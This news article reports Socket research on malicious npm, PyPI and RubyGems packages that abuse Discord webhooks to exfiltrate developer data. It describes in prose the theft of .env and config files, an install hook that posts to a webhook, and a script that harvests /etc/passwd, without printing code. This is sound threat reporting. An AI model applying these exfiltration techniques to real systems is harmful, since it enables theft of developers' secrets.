The Socket Threat Research Team has uncovered a growing trend among malicious package developers: leveraging Discord webhooks as command-and-control (C2) endpoints to exfiltrate sensitive data from developer systems. The technique, observed in multiple ecosystems including npm, PyPI, and RubyGems, marks a shift toward low-cost, resilient, and stealthy infrastructure for malware operations.
According to the researchers, “Threat actors historically have been more likely to use their own, controlled, command and control (C2) server. However, Socket’s Threat Research team has observed attackers adopting new and creative approaches to data exfiltration.”
Discord, primarily known as a chat platform, offers webhooks—HTTPS endpoints designed for automated message posting—that attackers have repurposed as data exfiltration pipelines. Socket explains that, “Discord webhooks are HTTPS endpoints. They embed a numeric ID and secret token, and possession of the URL is enough to post payloads into a target channel.”
Since webhook URLs are write-only, defenders cannot retrieve previous messages, making forensic recovery difficult. “Webhook URLs are effectively write-only. They do not expose channel history, and defenders cannot read back prior posts just by knowing the URL.”
This “invisible” channel offers attackers a free and persistent exfiltration route, disguised as benign HTTPS traffic to discord.com.
The first example detailed by Socket involves an npm package called mysql-dumpdiscord, which exfiltrated developer configuration files — such as .env, config.json, and ayarlar.js (Turkish for settings) — to a hard-coded Discord webhook.
The malicious code reads local files and sends their contents in structured messages to Discord. “For each filename, the code resolves to an absolute path, reads the file contents, and then builds a Discord message… It POSTs that message as JSON to the Discord webhook, essentially using the Discord webhook as an exfiltration point.”
Socket described it as “a simple file exfiltration dropper, but it uses Discord instead of its own C2 server.”
Another npm module, nodejs.discord, was discovered using a similar tactic — a minimalistic wrapper that sent any string input directly to a hard-coded webhook via WebhookClient. Though not inherently malicious, Socket warns that “because the webhook URL is embedded, anything passed in can be transmitted to a third party.”
Python’s PyPI ecosystem was also found hosting Discord-based C2 malware. One example, the malinssx package, masqueraded as a test library but secretly transmitted installation telemetry to a Discord channel.
Socket explains, “This file overrides the setuptools install command to run a post-install side effect that sends a message to a Discord webhook. During pip install, RunPayload.run() JSON-encodes {‘content’: ‘Ai đó vừa cài gói maladicus qua pip!’}.”
While seemingly harmless, Socket warns that “anyone who installs the package triggers an HTTP request to a third-party Discord channel, which can be used for simple telemetry or as an exfiltration mechanism.”
The same threat actor, under the alias sdadasda232323, uploaded additional clones (malicus, maliinn) using identical Discord webhooks — all of which have since been removed from PyPI.
The RubyGems.org repository was not spared. A gem named sqlcommenter_rails contained a malicious Ruby script (exploit.rb) that harvested extensive host data — including /etc/passwd contents — and exfiltrated it to Discord.
Socket reports that the script “reads /etc/passwd, grabs DNS servers from /etc/resolv.conf, hostname, current user, current/home directories, package metadata, and calls api.ipify.org to learn the machine’s public IP.”
The collected data was then formatted into a detailed message and sent to a Discord webhook:
“It formats everything, including the full /etc/passwd contents, into a multi-line message, prints it to stdout, then POSTs the same text as JSON to the webhook using Net::HTTP over TLS.”
This gem, under the guise of a “dependency confusion test,” demonstrates how Discord’s infrastructure can support both lightweight telemetry and high-volume data exfiltration in open-source attacks.
Socket’s Threat Research Team emphasizes that the abuse of Discord webhooks is not limited to any single language or ecosystem.
- CVE-2025-23171 & CVE-2025-23172: Versa Director Bugs Open Doors to Webshell Uploads and Command Execution
- DoS Flaws in Argo CD: Unauthenticated Attackers Can Crash Kubernetes Server with Single Request
- Malicious PyPI Package Targets Discord Developers with Token Theft and Backdoor Exploit
- Warning: Discord’s API Exploited for Malicious Takeover
- Critical flaw affects Rancher open source container management platform
